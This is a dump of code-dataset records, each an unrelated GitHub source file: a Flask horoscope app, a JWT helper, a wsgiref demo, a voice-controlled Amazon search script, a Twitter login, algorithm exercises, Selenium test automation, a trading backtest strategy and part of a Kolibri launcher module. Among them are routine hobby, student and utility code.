sign = 'pisces'\n horoscope = \"Powerful issues arise in your life that make it difficult to find peace, Pisces. Perhaps your first tendency is to confide in your partner. More than likely, this person is contributing to the difficulties you're now having. Your best bet is to spend some time alone. If you're already alone, so much the better. Cherish this time instead of letting it make you mad.\"\n if (month == 'mar'):\n sign = 'aries'\n horoscope = 'You may be trying to get to the end of the road too quickly without really enjoying all the steps along the way'\n if (month == 'apr'):\n sign = 'Taurus'\n horoscope = 'When your heart is gently touched, it feels loving, generous, and supportive of everyone, Taurus. If your heart is lonely, it feels deserted by everyone.'\n if (month == 'may'):\n sign = 'gemini'\n horoscope = \"You may be like a giant trying to befriend a small bug, Gemini. You have absolutely nothing in common and don't even speak the same language. With one accidental move, you could easily squash that little bug. This isn't to say that you can't learn to become best friends. Just know that this kind of relationship is going to take some work.\"\n if (month == 'jun'):\n sign = 'cancer'\n horoscope = \"There is irony in today's situation, Cancer. The only real remedy for situations like this is to accept them and joke about it. If you try to take yourself too seriously, especially when it comes to art or romance, you will inevitably fail.\"\n if (month == 'jul'):\n sign = 'Leo'\n horoscope = \"The hungrier you get, the more determined you will become, Leo. Be careful that your determination doesn't turn into desperation and neediness. It's unattractive and will get you nowhere. Keep on the upward spiral, and let determination turn into inspiration and cooperation. You will find this especially true when it comes to matters of the heart. You have a great deal of power. Put it to good use.\"\n if (month == 'aug'):\n sign = 'virgo'\n horoscope = \"If you're in the market for romance, Virgo, whether with a new partner or rekindling the fire with a current partner, be careful. Small issues could rage out control today. Extreme conditions are likely to occur, thanks to your sensitive emotions combined with a surge of energy from the outside. Try not to get too upset when tension rises because of something unimportant.\"\n if (month == 'sept'):\n sign = 'libra'\n horoscope = \"Things may get a bit difficult in your romantic life because of someone in the partnership who isn't necessarily taking a very realistic approach to the situation, Libra. There's a bit of a power play going on as someone tries to throw their weight around without considering the other person's feelings. Tension is brewing, and you'd be wise to deal with it now.\"\n if (month == 'oct'):\n sign = 'scorpio'\n horoscope = \"Your creative juices are flowing freely, Scorpio, but there appears to be a roadblock. Something or someone apparently doesn't want you to continue down the path you're on. Perhaps he or she is scared that you're going to discover a whole new passion in life that they don't necessarily agree with. Don't forget who is running your show - you and no one else.\"\n if (month == 'nov'):\n sign = 'saggitarius'\n horoscope = \"At the end of the day, you're the one who has to look in the mirror and know who you are, Sagittarius. Think about this the next time you're tempted to make a rude comment or spread a displeasing fact about someone else. One side of you may be able to rationalize behavior that the other side simply despises. Today look at both of sides of yourself, not just the one that pleases you.\"\n if (month == 'dec'):\n sign = 'capricorn'\n horoscope = \"When it comes to romance, your body is apt to turn to jelly today. You may be so emotional that you can't function, Capricorn. That's love. And even though it can be heavenly, it can also be debilitating. You could deliberate for hours about an issue because you don't want to make a move without your partner's input. If you don't have a romantic partner now, find one soon, but not today.\"\n lucky_number = random.randint(1,99)\n context = {\n 'name': request.args.get('operation'),\n 'horoscope': horoscope,\n 'lucky_number': lucky_number\n }\n return render_template('horoscope_result.html', **context)\n\n\nif __name__ == '__main__':\n app.run(debug=True, port = 3000)\n\n","repo_name":"lougoncharenko/ACS-1710-Assignments","sub_path":"ACS1710-Assignment2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22033503333","text":"import jwt\n\n\nclass Jwt:\n\n @staticmethod\n def jwtEncode(data: str) -> str:\n myJwt = jwt.encode(data, \"secret\", algorithm=\"HS256\")\n return myJwt\n\n @staticmethod\n def jwtDecode(data: str) -> bool:\n if data:\n try:\n jwt.decode(data, \"secret\", algorithms=[\"HS256\"])\n return True\n except (jwt.InvalidTokenError, jwt.DecodeError) as err:\n print(err)\n return False\n else:\n return False\n","repo_name":"THILAD/API_DEMO","sub_path":"PythonRestfulAndSocket/services/myJwt.py","file_name":"myJwt.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19504168895","text":"from wsgiref.simple_server import make_server\n# wsgiref本身就是个web框架,提供了一些固定的功能(请求和响应信息的封装,不需要我们自己写原生的socket了也不需要咱们自己来完成请求信息的提取了,提取起来很方便)\n#函数名字随便起\ndef application(environ, start_response):\n '''\n :param environ: 是全部加工好的请求信息,加工成了一个字典,通过字典取值的方式就能拿到很多你想要拿到的信息\n :param start_response: 帮你封装响应信息的(响应行和响应头),注意下面的参数\n :return:\n '''\n start_response('200 OK', [('k1','v1'),])\n # print(environ)\n print(environ['PATH_INFO']) #输入地址127.0.0.1:8000,这个打印的是'/',输入的是127.0.0.1:8000/index,打印结果是'/index'\n return [b'

Hello, web!

']\n\n#和咱们学的socketserver那个模块很像啊\nhttpd = make_server('127.0.0.1', 8080, application)\n\nprint('Serving HTTP on port 8080...')\n# 开始监听HTTP请求:\nhttpd.serve_forever()","repo_name":"myin1994/mylearn","sub_path":"Python框架/day46/07 wsgiref版.py","file_name":"07 wsgiref版.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22957254713","text":"import keyboard\r\nimport sys\r\nimport tkinter\r\nfrom PIL import Image, ImageTk\r\nimport threading\r\nimport time\r\nimport simpleaudio\r\n\r\nvalue = 2\r\ndouble_continue = False\r\n\r\n\r\n\"\"\"\r\ndef key_input():\r\n global item, canvas, txt, value\r\n value = txt.get()\r\n\"\"\"\r\n\r\ndef show_image():\r\n#外から触れるようにグローバル変数で定義\r\n global item, canvas, txt, value\r\n\r\n root = tkinter.Tk()\r\n root.title('test')\r\n root.geometry(\"250x250\")\r\n canvas = tkinter.Canvas(bg = \"black\", width=250, height=250)\r\n canvas.place(x=0, y=0)\r\n img = Image.open('image\\image1.png')\r\n img= ImageTk.PhotoImage(img)\r\n item = canvas.create_image(0, 0, image=img, anchor=tkinter.NW)\r\n root.mainloop()\r\n\"\"\"\r\n#入力ボックス作成\r\n txt = tkinter.Entry(width=20)\r\n txt.place(x=90, y=70)\r\n btn = tkinter.Button(root, text='変更', command=key_input)\r\n btn.place(x=140, y=70)\r\n\r\n\"\"\"\r\n#音声処理用ライブラリ\r\nimport speech_recognition as sr\r\n#発話用ライブラリ\r\nimport win32com.client\r\nimport winsound\r\n\r\n# Webサイトにアクセスするためのライブラリ\r\nimport requests\r\n# Webページの中のデータにアクセスできるようにするためのライブラリ\r\nfrom bs4 import BeautifulSoup\r\n#Web検索を行えるライブラリ\r\nfrom selenium import webdriver\r\nimport chromedriver_binary\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.select import Select\r\nfrom selenium.webdriver.chrome.options import Options\r\nimport urllib\r\n#文字列から抽出\r\nimport re\r\n\r\ndriver_path = \"C:\\\\driver\\\\chromedriver.exe\"\r\ndef talk(content):\r\n sapi = win32com.client.Dispatch(\"SAPI.SpVoice\")\r\n dog = win32com.client.Dispatch(\"SAPI.SpObjectTokenCategory\")\r\n dog.SetID(r\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Voices\", False)\r\n\r\n v = [t for t in dog.EnumerateTokens() if t.GetAttribute(\"Name\") == \"Microsoft Sayaka\"]\r\n if v:\r\n oldv = sapi.Voice\r\n sapi.Voice = v[0]\r\n sapi.Speak(content)\r\n sapi.Voice = oldv\r\n\r\ndef sound_effect(filename):\r\n wav_obj = simpleaudio.WaveObject.from_wave_file(filename)\r\n play_obj = wav_obj.play()\r\n play_obj.wait_done()\r\n\r\n#スレッドを立ててtkinterの画像表示を開始する\r\nthread1 = threading.Thread(target = show_image)\r\nthread1.start()\r\n\r\n\r\nr = sr.Recognizer()\r\n \r\n \r\n#url = 'https://www.amazon.co.jp/s?k='+text+'&__mk_ja_JP=カタカナ'\r\n#requests.get(url)\r\noptions = webdriver.ChromeOptions()\r\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\r\nbrowser = webdriver.Chrome(options=options)\r\nbrowser.get(\"http://www.amazon.co.jp/\")\r\n# 検索フォームが表示されるまで10秒待つ\r\nelement = WebDriverWait(browser, 10).until(EC.presence_of_element_located((By.NAME, \"field-keywords\")))\r\n\r\n# 検索フォームのテキストをクリア\r\n#browser.find_element_by_name(\"field-keywords\").clear()\r\ntalk(\"お探しの物はなんですか?\")\r\nwhile True:\r\n start = time.process_time()\r\n sound_effect(\"sound\\system41.wav\")\r\n with sr.Microphone() as input:\r\n r.adjust_for_ambient_noise(input)\r\n print(\"録音中:\")\r\n audio = r.listen(input)\r\n end = time.process_time()\r\n try:\r\n text = r.recognize_google(audio, language='ja-JP')\r\n print(text)\r\n keyword = text\r\n print(keyword)\r\n break\r\n except:\r\n print(\"認識できませんでした\")\r\n# 検索フォームにキーワードを入力\r\nelement.send_keys(keyword)\r\n\r\n# 検索実行\r\nelement.send_keys(Keys.RETURN)\r\n\r\nlink = browser.current_url\r\nprint(link)\r\nlinkjp = urllib.parse.unquote(link, 'UTF-8')\r\nprint(linkjp)\r\nhtml = requests.get(link)\r\n# ライブラリ'BeautifulSoup'を使って中のデータに自由にアクセスできるようにします。\r\nsoup = BeautifulSoup(html.content, 'html.parser') \r\ncats = soup.select(\"div#departments > ul > li\")\r\ndepartlist = []\r\nfor cat in cats:\r\n departlist.append(cat.get('id'))\r\nprint(departlist)\r\nbirds = soup.select(\"div#brandsRefinements> ul > li\")\r\nrefinelist = []\r\nfor bird in birds:\r\n refinelist.append(bird.get('id'))\r\nprint(refinelist)\r\n\r\ntalk(\"価格やブランド、接続方式と、重視するポイントが決まっていれば教えてください。\")\r\nprice = \"\"\r\nbrand = \"\"\r\nwhile True:\r\n start = time.process_time()\r\n sound_effect(\"sound\\system41.wav\")\r\n with sr.Microphone() as input:\r\n r.adjust_for_ambient_noise(input)\r\n print(\"録音中:\")\r\n audio = r.listen(input)\r\n end = time.process_time()\r\n try:\r\n text = r.recognize_google(audio, language='ja-JP')\r\n print(text)\r\n if \"安い\" in text:\r\n price = \"&s=price-asc-rank\"\r\n browser.get(linkjp + brand + price)#ページ読み込み\r\n talk(\"価格の安い順で並べ替えました。何かありましたらもう一度声をかけてください。\")\r\n continue\r\n elif \"高い\" in text:\r\n price = \"&s=price-desc-rank\"\r\n browser.get(linkjp + brand + price)#ページ読み込み\r\n talk(\"価格の高い順で並べ替えました。何かありましたらもう一度声をかけてください。\")\r\n continue\r\n elif \"円\" in text:\r\n price_only = \"\"\r\n price_line = int(re.sub(r\"\\D\", \"\", text))\r\n if \"万円\" in text:\r\n price_only = str(price_line) + \"0000\"\r\n price_line = str(price_line*0.9) + \"-\" + str(price_line*1.1)\r\n price = \"&price=\" + price_line\r\n browser.get(linkjp + brand + price)#ページ読み込み\r\n talk((price_only)+ \"円付近商品のみ表示しました。何かありましたらもう一度声をかけてください。\")\r\n continue\r\n elif \"リセット\" in text or \"解除\" in text:\r\n brand = \"\"\r\n price = \"\"\r\n browser.get(linkjp)#ページ読み込み\r\n talk(\"すべての検索条件をリセットしました。何かありましたらもう一度声をかけてください\")\r\n elif 'p_89/' + text in refinelist:\r\n text = text.replace('p_89/',\"\")\r\n brand = \"&rh=n:3210981,p_89:\" + text\r\n print(linkjp + \"&s=price-asc-rank\" + brand +price_line)\r\n browser.get(linkjp + brand + price)#ページ読み込み\r\n talk(text + \"の商品のみ表示しました。何かありましたらもう一度声をかけてください\")\r\n elif \"価格\" in text:\r\n talk(\"価格の安い順、高い順、具体的な価格は決まっていますか?\")\r\n continue\r\n elif \"ブランド\" in text:\r\n talk(\"どのブランドでしょうか?\")\r\n elif \"接続方式\" in text:\r\n talk(\"ここに接続方式の処理をかく\")\r\n except:\r\n print(\"認識できませんでした\")","repo_name":"kx47g/sotsuken","sub_path":"vui_main.py","file_name":"vui_main.py","file_ext":"py","file_size_in_byte":7099,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24157317597","text":"from user import User\nfrom database import Database\nimport twitter_util\n\nDatabase.initialise() #initialise database\nuser_email = input(\"Enter your email address :\") #Ask for user email\nuser = User.load_from_db_by_email(user_email) #load the data from database\n\nif not user: #if user is not there in database\n request_token = twitter_util.get_request_token() #ask for request token\n\n oauth_verifier = twitter_util.get_oauth_verifier(request_token) #get the oauth verifier\n\n access_token = twitter_util.get_access_token(request_token,oauth_verifier) #get access token\n #Register the new user\n\n first_name = input(\"Enter your first name :\")\n last_name = input(\"Enter your last name :\")\n user = User(user_email,first_name,last_name,access_token['oauth_token'],access_token['oauth_token_secret'],None)\n user.save_to_db()\n\nuri = 'https://api.twitter.com/1.1/search/tweets.json?q=computers+filter:images'\ntweets = user.twitter_request(uri)\nfor tweet in tweets['statuses']:\n print(tweet['text'])","repo_name":"tarun-sharma-vst-au4/Twitter-Sentiment-Analysis","sub_path":"files/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7900385981","text":"import sys\ninput = sys.stdin.readline\nfrom collections import deque\nfrom itertools import combinations\n\nN, M = map(int, input().split())\nmaps = [list(map(int, input().split())) for _ in range(N)]\n\nhome = []\nchicken = []\n\n# 치킨집 탐방\nfor i in range(N):\n for j in range(N):\n if maps[i][j] == 2:\n chicken.append([i, j])\n elif maps[i][j] == 1:\n home.append([i, j])\nprint(\"home = \", home)\n\n# 치킨집 선택 리스트\npch = list(combinations(chicken, M))\nprint(\"pch = \", pch)\n# 결과 저장할 리스트\nresult = [0] * len(pch)\n\nfor i in home:\n for j in range(len(pch)):\n a = 100\n for k in pch[j]:\n temp = abs(i[0]-k[0]) + abs(i[1]-k[1])\n a = min(a, temp)\n # print(\"i,j, k, a = \", i,j, k, a)\n result[j] += a\n\nprint(result)\nprint(min(result))\n","repo_name":"GayeonKimm/CT","sub_path":"BOJ/구현/15686 치킨 배달.py","file_name":"15686 치킨 배달.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70053011985","text":"class TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\ndef lowestCommonAncestor(\n self, root: \"TreeNode\", p: \"TreeNode\", q: \"TreeNode\"\n) -> \"TreeNode\":\n # def __init__(self):\n # self.ans = None\n\n stack = [root]\n parent = {root: None}\n\n while p not in parent or q not in parent:\n node = stack.pop()\n if node.left:\n parent[node.left] = node\n stack.append(node.left)\n if node.right:\n parent[node.right] = node\n stack.append(node.right)\n ancestor = set()\n while p:\n ancestor.add(p)\n p = parent[p]\n while q not in ancestor:\n q = parent[q]\n return q\n","repo_name":"DivyanshiChouksey/Data-Structure-Algorithm","sub_path":"230.Youngest Common Ancestor.py","file_name":"230.Youngest Common Ancestor.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38577638107","text":"'''\n封装滞纳金收款独立功能\n'''\n\nfrom selenium import webdriver\nfrom PageObject.addLateFeeCollectionPage import *\nfrom PageObject.tableDataPage import *\nfrom toolKit.log import *\nfrom toolKit.highLightElement import *\n\n\n\ndef addLateFeeCollection(driver, merchantName='', contractName='', lateFeeNum='', paymentTime='', collectionMoney='', deductMoney=''):\n\talfcp = AddLateFeeCollectionPage(driver)\n\tlogger.info(u'测试滞纳金收款')\n\talfcp.financialManagement().click()\n\tlogger.info(u'点击财务管理')\n\talfcp.lateFeeManagement().click()\n\tlogger.info(u'点击滞纳金管理')\n\talfcp.lateFeeCollection().click()\n\tlogger.info(u'点击滞纳金收款')\n\ttime.sleep(4)\n\tdriver.switch_to.frame(alfcp.frameOfLateFeeCollection())\n\thighLightElement(driver, alfcp.add())\n\talfcp.add().click()\n\ttime.sleep(4)\n\tlogger.info(u'点击添加按钮')\n\tdriver.switch_to.default_content()\n\tdriver.switch_to.frame(alfcp.frameOfAddLateFeeCollection())\n\thighLightElement(driver, alfcp.merchant())\n\talfcp.merchant().click()\n\tlogger.info(u'点击商户名称文本框')\n\thighLightElement(driver, alfcp.merchantInput())\n\talfcp.merchantInput().send_keys(merchantName)\n\tlogger.info(u'输入商户名称:%s' % merchantName)\n\thighLightElement(driver, alfcp.merchantSearch())\n\talfcp.merchantSearch().click()\n\tlogger.info(u'点击商户名称搜索按钮')\n\thighLightElement(driver, alfcp.merchantSearchResult())\n\talfcp.merchantSearchResult().click()\n\tlogger.info(u'选择商户名称搜索结果')\n\thighLightElement(driver, alfcp.contract())\n\talfcp.contract().click()\n\tlogger.info(u'点击合同号文本框')\n\thighLightElement(driver, alfcp.contractInput())\n\talfcp.contractInput().send_keys(contractName)\n\tlogger.info(u'输入合同号:%s' % contractName)\n\thighLightElement(driver, alfcp.contractSearch())\n\talfcp.contractSearch().click()\n\tlogger.info(u'点击合同号搜索按钮')\n\ttime.sleep(2)\n\thighLightElement(driver, alfcp.contractSearchResult())\n\talfcp.contractSearchResult().click()\n\tlogger.info(u'选择合同号搜索结果')\n\thighLightElement(driver, alfcp.lateFeeNum())\n\talfcp.lateFeeNum().click()\n\tlogger.info(u'点击滞纳金单号文本框')\n\thighLightElement(driver, alfcp.lateFeeNumInput())\n\talfcp.lateFeeNumInput().send_keys(lateFeeNum)\n\tlogger.info(u'输入滞纳金单号:%s' % lateFeeNum)\n\thighLightElement(driver, alfcp.lateFeeSearch())\n\talfcp.lateFeeSearch().click()\n\tlogger.info(u'点击滞纳金单号搜索按钮')\n\thighLightElement(driver, alfcp.lateFeeSearchResult())\n\talfcp.lateFeeSearchResult().click()\n\tlogger.info(u'选择滞纳金单号搜索结果')\n\thighLightElement(driver, alfcp.paymentTime())\n\talfcp.paymentTime().clear()\n\talfcp.paymentTime().send_keys(paymentTime)\n\tlogger.info(u'输入收款日期:%s' % paymentTime)\n\thighLightElement(driver, alfcp.feeType())\n\talfcp.feeType().click()\n\tlogger.info(u'点击费用状态文本框')\n\thighLightElement(driver, alfcp.feeTypeSelect1())\n\talfcp.feeTypeSelect1().click()\n\tlogger.info(u'选择费用状态')\n\thighLightElement(driver, alfcp.addRow())\n\talfcp.addRow().click()\n\tlogger.info(u'点击增加行按钮')\n\thighLightElement(driver, alfcp.collectionTypeBox())\n\talfcp.collectionTypeBox().click()\n\tlogger.info(u'点击收款方式文本框')\n\talfcp.collectionTypeBoxInner().click()\n\talfcp.collectionType().click()\n\tlogger.info(u'选择收款方式')\n\thighLightElement(driver, alfcp.collectionMoneyBox())\n\talfcp.collectionMoneyBox().click()\n\tlogger.info(u'点击收款金额文本框')\n\talfcp.collectionMoney().clear()\n\talfcp.collectionMoney().send_keys(collectionMoney)\n\tlogger.info(u'输入收款金额:%s' % collectionMoney)\n\thighLightElement(driver, alfcp.deductMoneyBox())\n\talfcp.deductMoneyBox().click()\n\tlogger.info(u'点击本次抵扣金额文本框')\n\talfcp.deductMoney().clear()\n\talfcp.deductMoney().send_keys(deductMoney)\n\tlogger.info(u'输入抵扣金额:%s' % deductMoney)\n\thighLightElement(driver, alfcp.save())\n\talfcp.save().click()\n\tlogger.info(u'点击保存按钮')\n\thighLightElement(driver, alfcp.confirm())\n\talfcp.confirm().click()\n\tlogger.info(u'确认收款信息')\n\tlogger.info(u'提示信息:%s' % (alfcp.information()))\n\ndef addLateFeeCollectionList(driver, contractName=''):\n\talfcp = AddLateFeeCollectionPage(driver)\n\tdriver.switch_to.default_content()\n\tdriver.switch_to.frame(alfcp.frameOfLateFeeCollection())\n\ttime.sleep(3)\n\thighLightElement(driver, alfcp.contractOfList())\n\talfcp.contractOfList().click()\n\thighLightElement(driver, alfcp.contractInputOfList())\n\talfcp.contractInputOfList().send_keys(contractName)\n\thighLightElement(driver, alfcp.contractSearchOfList())\n\talfcp.contractSearchOfList().click()\n\thighLightElement(driver, alfcp.contractSearchResultOfList())\n\talfcp.contractSearchResultOfList().click()\n\thighLightElement(driver, alfcp.search())\n\talfcp.search().click()\n\ttime.sleep(2)\n\tgtd = GetTableData(driver)\n\tfileName = listData + 'addLateFeeCollectionList.log'\n\ttable = PrettyTable(['购物中心', '状态', '经营商户', '经营店铺', '合同号', '滞纳金单号', '收款金额', '抵扣金额', '未收款金额', '收款时间'])\n\ttable.align['购物中心'] = '1'\n\ttable.padding_width = 1\n\ttable.add_row([gtd.row14(), gtd.row16(), gtd.row17(), gtd.row18(), gtd.row19(), gtd.row110(), gtd.row111(), gtd.row112(), gtd.row113(), gtd.row114()])\n\tlogger.info(u'正在获取列表数据')\n\ttime.sleep(2)\n\tprint(table)\n\twith open(fileName, 'w') as file:\n\t\tfile.write(str(table))\n\tlogger.info(u'保存位置:%s' % fileName)\n","repo_name":"thinker365/MIS-3.0.0","sub_path":"Action/addLateFeeCollection.py","file_name":"addLateFeeCollection.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16702321454","text":"import logging\n\nimport pandas as pd\n\nfrom backtest.strategy import Strategy\nfrom utils import utils\nfrom utils.utils import date2str\n\nlogger = logging.getLogger(__name__)\n\n\nclass MAStrategy(Strategy):\n\n def __init__(self, broker, params):\n super().__init__(broker, None)\n self.params = params\n self.df_position = pd.DataFrame()\n\n def set_data(self, df_dict: dict, df_baseline=None):\n super().set_data(df_baseline, df_dict)\n self.df = df_dict[self.params.code]\n self.code = self.params.code\n\n def next(self, today, trade_date):\n super().next(today, trade_date)\n s_today = self.get_value(self.df, today)\n s_yesterday = utils.get_series(self.df, today, -1)\n\n # 不是交易日数据,忽略\n if s_today is None: return\n\n position = self.broker.get_position(self.code)\n if not position and s_today.close > s_today.ma:\n if not self.broker.get_position(self.code):\n self.broker.buy(self.code, trade_date, amount=self.broker.total_cash)\n logger.debug(\"[%s] [%s] close[%.4f] > ma[%.4f], 买入\",\n date2str(today), self.code, s_today.close, s_today.ma)\n return\n\n if position and s_today.close < s_today.ma:\n if self.broker.get_position(self.code):\n logger.debug(\"[%s] [%s] close[%.4f] < ma[%.4f], 卖出\",\n date2str(today), self.code, s_today.close, s_today.ma)\n self.broker.sell_out(self.code, trade_date)\n return\n\n # 如果持仓,看是否到止损,到止损,就需要卖出清仓了\n # 按理说应该是盘中止损,但是,我的框架模拟不出来,只好第二天再止损\n # 看今天的收盘价已经超过损失了\n # import pdb;pdb.set_trace()\n if position and s_today.max_drawdown < self.params.max_drawdown:\n pnl = (s_today.close - position.cost) / position.cost\n logger.warning(\"[%s] [%s]今日最大回撤[%.4f] 大于了 规定的最大回撤[%.4f],止盈/损清仓[%.2f%%]\",\n date2str(today), self.code, s_today.max_drawdown, self.params.max_drawdown, pnl * 100)\n self.broker.sell_out(self.code, trade_date)","repo_name":"piginzoo/quant_research","sub_path":"cta/ma/my/ma_strategy.py","file_name":"ma_strategy.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"25568026225","text":"from modeller import *\nfrom modeller.automodel import *\n\nclass MyModel(automodel):\n def special_patches(self, aln):\n self.rename_segments(segment_ids=['A'],\n renumber_residues=[944])\n\n\ne = environ()\n\na = MyModel(e, alnfile='3KFO-fill.ali',\n knowns='3KFO', sequence='3KFO-fill')\na.starting_model = 1\na.ending_model = 5\na.make()\n","repo_name":"saltzberg/imp_website","sub_path":"1.0/tutorial/saxs/fill.py","file_name":"fill.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"25991719905","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport base64\nimport configparser\nimport logging\nimport os\nimport re\nimport shutil\nimport subprocess\n\nfrom kolibri.core.content.models import ChannelMetadata\nfrom kolibri.dist.django.utils.functional import cached_property\nfrom kolibri.dist.django.utils.six import BytesIO\nfrom PIL import Image\nfrom PIL import ImageDraw\n\nfrom .path_utils import ensure_dir\nfrom .path_utils import get_content_share_dir_path\nfrom .path_utils import get_kolibri_gnome_path\nfrom .path_utils import try_remove\nfrom .pillow_utils import center_xy\nfrom .pillow_utils import crop_image_to_square\nfrom .pillow_utils import image_is_square\nfrom .pillow_utils import paste_center\nfrom .pillow_utils import resize_preserving_aspect_ratio\n\nlogger = logging.getLogger(__name__)\n\nDATA_URI_PATTERN = re.compile(\n \"^(data:)(?P[\\\\w\\\\/\\\\+-]*)(;base64),(?P.*)\"\n)\n\nLAUNCHER_CATEGORIES = (\"Education\", \"X-Kolibri-Channel\")\n\nKOLIBRI_APP_ID = os.environ.get(\"FLATPAK_ID\", \"org.learningequality.Kolibri\")\nKOLIBRI_SEARCH_PROVIDER_BUS_NAME = KOLIBRI_APP_ID + \".SearchProvider\"\nKOLIBRI_SEARCH_PROVIDER_OBJECT_PATH = \"/\" + KOLIBRI_SEARCH_PROVIDER_BUS_NAME.replace(\n \".\", \"/\"\n)\n\nCHANNEL_DESKTOP_ID_FORMAT = KOLIBRI_APP_ID + \".channel_{}\"\nCHANNEL_SEARCH_PROVIDER_OBJECT_PATH_FORMAT = (\n KOLIBRI_SEARCH_PROVIDER_OBJECT_PATH + \"/channel_{}\"\n)\n\n\ndef update_channel_launchers(force=False):\n context = ChannelLaunchersContext()\n\n launchers_from_db = list(ChannelLauncher_FromDatabase.load_all(context))\n launchers_from_disk = list(ChannelLauncher_FromDisk.load_all(context))\n\n did_icons_change = False\n\n for launcher in launchers_from_disk:\n if not any(map(launcher.is_same_channel, launchers_from_db)):\n logger.info(\"Removing desktop launcher %s\", launcher)\n launcher.delete()\n did_icons_change = True\n\n for launcher in launchers_from_db:\n if not any(map(launcher.is_same_channel, launchers_from_disk)):\n logger.info(\"Creating desktop launcher %s\", launcher)\n launcher.save()\n did_icons_change = True\n elif force or any(map(launcher.compare, launchers_from_disk)):\n logger.info(\"Updating desktop launcher %s\", launcher)\n launcher.save()\n did_icons_change = True\n\n if did_icons_change:\n update_icon_cache_params = [context.icon_theme_dir]\n\n try:\n system_theme_index = \"/usr/share/icons/hicolor/index.theme\"\n theme_index = os.path.join(context.icon_theme_dir, \"index.theme\")\n shutil.copyfile(system_theme_index, theme_index)\n except OSError:\n update_icon_cache_params += [\"--ignore-theme-index\"]\n\n try:\n subprocess.run([\"gtk-update-icon-cache\", *update_icon_cache_params])\n except OSError as error:\n logger.info(\"Error running gtk-update-icon-cache: %s\", error)\n\n\nclass ChannelLaunchersContext(object):\n @property\n def applications_dir(self):\n return os.path.join(get_content_share_dir_path(), \"applications\")\n\n @property\n def search_providers_dir(self):\n return os.path.join(\n get_content_share_dir_path(), \"gnome-shell\", \"search-providers\"\n )\n\n @property\n def icon_theme_dir(self):\n return os.path.join(get_content_share_dir_path(), \"icons\", \"hicolor\")\n\n\nclass ChannelLauncher(object):\n def __init__(self, context):\n self.__context = context\n\n def __str__(self):\n return self.desktop_file_name\n\n @property\n def channel_id(self):\n raise NotImplementedError()\n\n @property\n def desktop_id(self):\n return CHANNEL_DESKTOP_ID_FORMAT.format(self.channel_id)\n\n @property\n def channel_version(self):\n raise NotImplementedError()\n\n @property\n def desktop_file_path(self):\n return os.path.join(self.__context.applications_dir, self.desktop_file_name)\n\n @property\n def desktop_file_name(self):\n return \"{}.desktop\".format(self.desktop_id)\n\n @property\n def search_provider_file_path(self):\n return os.path.join(\n self.__context.search_providers_dir, self.search_provider_file_name\n )\n\n @property\n def search_provider_file_name(self):\n return \"{}.ini\".format(self.desktop_id)\n\n def get_icon_file_path(self, file_name, size=\"256x256\"):\n return os.path.join(self.__context.icon_theme_dir, size, \"apps\", file_name)\n\n def compare(self, other):\n if not self.is_same_channel(other):\n return None\n self_channel, self_format = map(int, self.channel_version.split(\"~\"))\n other_channel, other_format = map(int, other.channel_version.split(\"~\"))\n return (self_channel - other_channel) or (self_format - other_format)\n\n def is_same_channel(self, other):\n return (\n self.desktop_file_path == other.desktop_file_path\n and self.channel_id == other.channel_id\n )\n\n def save(self):\n try:\n icon_name = self.write_channel_icon()\n except Exception as error:\n logger.warning(\n \"Error writing icon file for channel %s: %s\", self.channel_id, error\n )\n icon_name = None\n\n try:\n self.write_desktop_file(icon_name)\n except Exception as error:\n logger.warning(\n \"Error writing desktop file for channel %s: %s\", self.channel_id, error\n )\n\n try:\n self.write_search_provider()\n except Exception as error:\n logger.warning(\n \"Error writing search provider for channel %s: %s\",\n self.channel_id,\n error,\n )\n\n def delete(self):\n self.delete_desktop_file()\n self.delete_search_provider()\n self.delete_channel_icon()\n\n def write_desktop_file(self, icon_name):\n raise NotImplementedError()\n\n def delete_desktop_file(self):\n os.remove(self.desktop_file_path)\n\n def write_search_provider(self):\n raise NotImplementedError()\n\n def delete_search_provider(self):\n try_remove(self.search_provider_file_path)\n\n def write_channel_icon(self):\n raise NotImplementedError()\n\n def delete_channel_icon(self):\n raise NotImplementedError()\n\n\nclass ChannelLauncher_FromDatabase(ChannelLauncher):\n FORMAT_VERSION = 7\n\n def __init__(self, context, channelmetadata):\n super().__init__(context)\n self.__channelmetadata = channelmetadata\n\n @classmethod\n def load_all(cls, context):\n for channelmetadata in ChannelMetadata.objects.filter(root__available=True):\n yield cls(context, channelmetadata)\n\n @property\n def channel_id(self):\n return self.__channelmetadata.id\n\n @property\n def channel_version(self):\n return \"{}~{}\".format(self.__channelmetadata.version, self.FORMAT_VERSION)\n\n @cached_property\n def __channel_icon(self):\n try:\n return ChannelIcon(self.__channelmetadata.thumbnail)\n except ValueError:\n return None\n\n def write_desktop_file(self, icon_name):\n 